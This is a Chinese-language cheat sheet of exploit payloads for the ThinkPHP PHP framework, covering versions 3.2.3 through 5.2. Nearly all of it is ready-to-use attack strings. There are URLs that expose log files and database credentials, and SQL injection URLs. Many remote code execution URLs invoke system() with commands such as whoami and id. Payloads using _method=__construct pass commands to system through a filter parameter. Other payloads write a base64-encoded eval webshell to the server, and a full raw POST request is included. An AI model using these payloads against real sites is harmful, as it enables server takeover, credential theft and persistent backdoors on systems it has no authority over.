thinkphp漏洞

参考资料：https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection

敏感信息

THINKPHP3.2 结构：Application\Runtime\Logs\Home\16_09_09.log
THINKPHP3.1结构：Runtime\Logs\Home\16_09_09.log
http://demo.xxxxx.cc/Runtime/Logs/User/16_09_06.log 

thinkphp 3.2.3 注入

参考资料：https://darkless.cn/2020/06/07/thinkphp3.2.3-sqli/

http://127.0.0.1:8888/index.php?m=Home&c=Index&a=test&id[where]=1 and updatexml(1,concat(0x7e,database(),0x7e),1)

thinkphp 5.0.22

1、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username
2、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.password
3、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
4、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

?s=index/\think\Lang/load&file=../../test.jpg    // 包含任意文件
?s=index/\think\Config/load&file=../../t.php     // 包含任意.php文件

thinkphp 5

5、http://127.0.0.1/tp5/public/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1

thinkphp 5.0.21

6、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
7、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

thinkphp 5.1.*

8、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1
9、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=cmd
10、http://url/to/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
11、http://url/to/thinkphp5.1.29/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
12、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
13、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
14、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
15、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd

未知版本

 16、?s=index/\think\module/action/param1/${@phpinfo()}
 17、?s=index/\think\Module/Action/Param/${@phpinfo()}
 18、?s=index/\think/module/aciton/param1/${@print(THINK_VERSION)}
 19、index.php?s=/home/article/view_recent/name/1' 
 header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#"
 20、index.php?s=/home/shopcart/getPricetotal/tag/1%27
 21、index.php?s=/home/shopcart/getpriceNum/id/1%27
 22、index.php?s=/home/user/cut/id/1%27
 23、index.php?s=/home/service/index/id/1%27
 24、index.php?s=/home/pay/chongzhi/orderid/1%27
 25、index.php?s=/home/pay/index/orderid/1%27
 26、index.php?s=/home/order/complete/id/1%27
 27、index.php?s=/home/order/complete/id/1%27
 28、index.php?s=/home/order/detail/id/1%27
 29、index.php?s=/home/order/cancel/id/1%27
 30、index.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+
 31、POST /index.php?s=/home/user/checkcode/ HTTP/1.1
 Content-Disposition: form-data; name="couponid"
 1') union select sleep('''+str(sleep_time)+''')#

thinkphp 5.0.23（完整版）debug模式

32、(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx

thinkphp 5.0.23(完整版)

33、（post）public/index.php?s=captcha (data)  _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls  -al


Cookie:file_put_contents/**/('./readme.txt','h3art3ars');
Cookie:<?php phpinfo/**/();?>
Cookie:<? $a='+a + ';eval/**/(base64_decode/**/($a));?>
_method=__construct&method=get&filter[]=think\__include_file&get[]=../runtime/log/202005/22.log&1=cGhwaW5mbygpOw==

_method=__construct&method=get&filter[]=assert&get[]=phpinfo();
_method=__construct&method=get&filter[]=assert&get[]=file_put_contents('./readme.php',base64_decode('PD9waHAgCiAgICAkYiA9IHN1YnN0cigkX1BPU1RbJ2gzYXJ0M2FycyddLCAxKTsKICAgIGV2YWwoYmFzZTY0X2RlY29kZSgkYikpOwo/Pg=='));

assert调用assert
_method=__construct&method=get&filter[]=assert&get[]=assert(base64_decode($_POST[1]));&1=ZmlsZV9wdXRfY29udGVudHMoJy4vcmVhZG1lLnBocCcsYmFzZTY0X2RlY29kZSgnUEQ5d2FIQWdDaUFnSUNBa1lpQTlJSE4xWW5OMGNpZ2tYMUJQVTFSYkoyZ3pZWEowTTJGeWN5ZGRMQ0F4S1RzS0lDQWdJR1YyWVd3b1ltRnpaVFkwWDJSbFkyOWtaU2drWWlrcE93by9QZz09Jykp

thinkphp 5.0.10（完整版）

34、(post)public/index.php?s=index/index/index (data)s=whoami&_method=__construct&method&filter[]=system

thinkphp 5.1.* 和 5.2.* 和 5.0.*

35、(post)public/index.php (data)c=exec&f=calc.exe&_method=filter

版本号：5.0.8~5.0.19

s=whoami&_method=__construct&filter&filter=system

版本号：5.0.20~5.0.23

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami
或
_method=__construct&filter[]=system&server[REQUEST_METHOD]=whoami

注意

发包的请求头
Content-Type: application/x-www-form-urlencoded

POST /tp5022/public/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: think_var=zh-cn
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

_method=__construct&filter[]=system&server[REQUEST_METHOD]=whoami